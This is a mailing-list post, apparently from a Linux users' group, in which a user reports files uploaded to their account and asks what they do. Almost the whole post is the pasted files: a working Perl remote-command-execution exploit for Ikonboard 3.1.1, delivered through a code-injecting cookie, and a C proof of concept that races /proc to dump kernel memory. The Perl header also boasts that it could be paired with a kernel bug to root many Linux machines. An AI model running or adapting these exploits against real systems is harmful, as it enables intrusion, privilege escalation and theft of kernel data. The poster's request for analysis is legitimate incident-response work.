Someone uploaded a file in one of my accounts. Can someone tell me what it does. Thank you.
FILE 1 IBE.C ---------------------------------------------------------------------- #!/usr/bin/perl # # Date: 5 May 2003 # Author: DeadLine [http://www.Q8Crackers.us] # # Ikonboard 3.1.1 Remote Command Execution PoC # ============================================ # This bug was found by Nick Cleaton. # # For more info and patch, go to: # http://archives.neohapsis.com/archives/bugtraq/2003-04/0027.html # # This is a functional version. Use at your own risk. # Coupled wif the kernel bug, this could be used to root quite # an impressive number of Linux boxes out there. Enjoy! # # Greetz.. my team mates: Marvol .. befcake .. Remsis # And some new frens: vegas ;) # use Socket; use FileHandle; if ($ARGV[0] eq '') { print "Usage: $0 <host> [cmd] [path]\n"; exit; } my $port=80; my $host=$ARGV[0]; my $addr=getaddr($ARGV[0]); my $cmd=$ARGV[1]?($ARGV[1]):"/bin/uname -a"; my $path=$ARGV[2]?($ARGV[2]):"/cgi-bin/ikonboard.cgi"; my $buff=URLEncode(".\0\" unless(1);" ."print \"Content-type: text/plain\\r\\n\\r\\n\";" ."print \"---BEGIN---\\n\".`$cmd`.\"\\n---END---\";exit;#"); socket(SOCKET,PF_INET,SOCK_STREAM,(getprotobyname('tcp'))[2]); connect(SOCKET,pack('Sna4x8',AF_INET,$port,$addr,2)) || die "Can't connect: $!\n"; SOCKET->autoflush(); print SOCKET "GET $path HTTP/1.1\r\n"; print SOCKET "Host: $host\r\n"; print SOCKET "Cookie: lang=$buff\r\n"; print SOCKET "Connection: close\r\n\r\n"; print "Ikonboard Exploit, by DeadLine [ [EMAIL PROTECTED] ]\n\n"; while (<SOCKET>) { if (/^---BEGIN---/) { print "> $cmd\n"; while (<SOCKET>){ if (/^---END---/) { exit; } print; } } } print "$host seems not vulnerable.\n"; exit; sub getaddr { my $host=($_[0]); my $n=$host; $n=~tr/\.//d; if ($n=~m/\d+/) { return pack('C4',split('\.',$host)); } else { return (gethostbyname($host))[4]; } } # URLEncode routine, courtesy of Glenn Fleishman sub URLEncode { my $theURL=$_[0]; $theURL=~ s/([\W])/"%".uc(sprintf("%2.2x",ord($1)))/eg; return $theURL; } FILE 2 kernel_proc.dump-------------------------------------------------------- ---- /* * * /proc ppos kernel memory read (semaphore method) * * gcc -O3 proc_kmem_dump.c -o proc_kmem_dump * * Copyright (c) 2004 iSEC Security Research. All Rights Reserved. * * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS" * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED. * */ #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <signal.h> #include <string.h> #include <errno.h> #include <unistd.h> #include <fcntl.h> #include <time.h> #include <sched.h> #include <sys/socket.h> #include <sys/select.h> #include <sys/time.h> #include <sys/mman.h> #include <linux/unistd.h> #include <asm/page.h> // define machine mem size in MB #define MEMSIZE 64 _syscall5(int, _llseek, uint, fd, ulong, hi, ulong, lo, loff_t *, res, uint, wh); void fatal(const char *msg) { printf("0"); if(!errno) { fprintf(stderr, "FATAL ERROR %s0", msg); } else { perror(msg); } printf("0"); fflush(stdout); fflush(stderr); exit(31337); } static int cpid, nc, fd, pfd, r=0, i=0, csize, fsize=1024*1024*MEMSIZE, size=PAGE_SIZE, us; static volatile int go[2]; static loff_t off; static char *buf=NULL, *file, child_stack[PAGE_SIZE]; static struct timeval tv1, tv2; static struct stat st; // child close sempahore & sleep int start_child(void *arg) { // unlock parent & close semaphore go[0]=0; madvise(file, csize, MADV_DONTNEED); madvise(file, csize, MADV_SEQUENTIAL); gettimeofday(&tv1, NULL); read(pfd, buf, 0); go[0]=1; r = madvise(file, csize, MADV_WILLNEED); if(r) fatal("madvise"); // parent blocked on mmap_sem? GOOD! if(go[1] == 1 || _llseek(pfd, 0, 0, &off, SEEK_CUR)<0 ) { r = _llseek(pfd, 0x7fffffff, 0xffffffff, &off, SEEK_SET); if( r == -1 ) fatal("lseek"); printf("0 Race won!"); fflush(stdout); go[0]=2; } else { // printf("0 Race lost %d", use another file!0, go[1]); fflush(stdout); kill(getppid(), SIGTERM); } _exit(1); return 0; } void usage(char *name) { printf("0SAGE: %s <file not in cache>", name); printf("0"); exit(1); } int main(int ac, char **av) { if(ac<2) usage(av[0]); // mmap big file not in cache r=stat(av[1], &st); if(r) fatal("stat file"); csize = (st.st_size + (PAGE_SIZE-1)) & ~(PAGE_SIZE-1); fd=open(av[1], O_RDONLY); if(fd<0) fatal("open file"); file=mmap(NULL, csize, PROT_READ, MAP_SHARED, fd, 0); if(file==MAP_FAILED) fatal("mmap"); close(fd); printf("0 mmaped uncached file at %p - %p", file, file+csize); fflush(stdout); pfd=open("/proc/mtrr", O_RDONLY); if(pfd<0) fatal("open"); fd=open("kmem.dat", O_RDWR|O_CREAT|O_TRUNC, 0644); if(fd<0) fatal("open data"); r=ftruncate(fd, fsize); if(r<0) fatal("ftruncate"); buf=mmap(NULL, fsize, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0); if(buf==MAP_FAILED) fatal("mmap"); close(fd); printf("0 mmaped kernel data file at %p", buf); fflush(stdout); // clone thread wait for child sleep nc = nice(0); cpid=clone(&start_child, child_stack + sizeof(child_stack)-4, CLONE_FILES|CLONE_VM, NULL); nice(19-nc); while(go[0]==0) { i++; } // try to read & sleep & move fpos to be negative gettimeofday(&tv1, NULL); go[1] = 1; r = read(pfd, buf, size ); go[1] = 2; gettimeofday(&tv2, NULL); if(r<0) fatal("read"); while(go[0]!=2) { i++; } us = tv2.tv_sec - tv1.tv_sec; us *= 1000000; us += (tv2.tv_usec - tv1.tv_usec) ; printf("0 READ %d bytes in %d usec", r, us); fflush(stdout); r = _llseek(pfd, 0, 0, &off, SEEK_CUR); if(r < 0 ) { printf("0 SUCCESS, lseek fails, reading kernel mem...0"); fflush(stdout); i=0; for(;;) { r = read(pfd, buf, PAGE_SIZE ); if(r!=PAGE_SIZE) break; buf += PAGE_SIZE; i++; printf(" PAGE %6d", i); fflush(stdout); } printf("0 done, err=%s", strerror(errno) ); fflush(stdout); } close(pfd); printf("0"); sleep(1); kill(cpid, 9); return 0; } -- Philippine Linux Users' Group (PLUG) Mailing List [EMAIL PROTECTED] (#PLUG @ irc.free.net.ph) Official Website: http://plug.linux.org.ph Searchable Archives: http://marc.free.net.ph . To leave, go to http://lists.q-linux.com/mailman/listinfo/plug . Are you a Linux newbie? To join the newbie list, go to http://lists.q-linux.com/mailman/listinfo/ph-linux-newbie
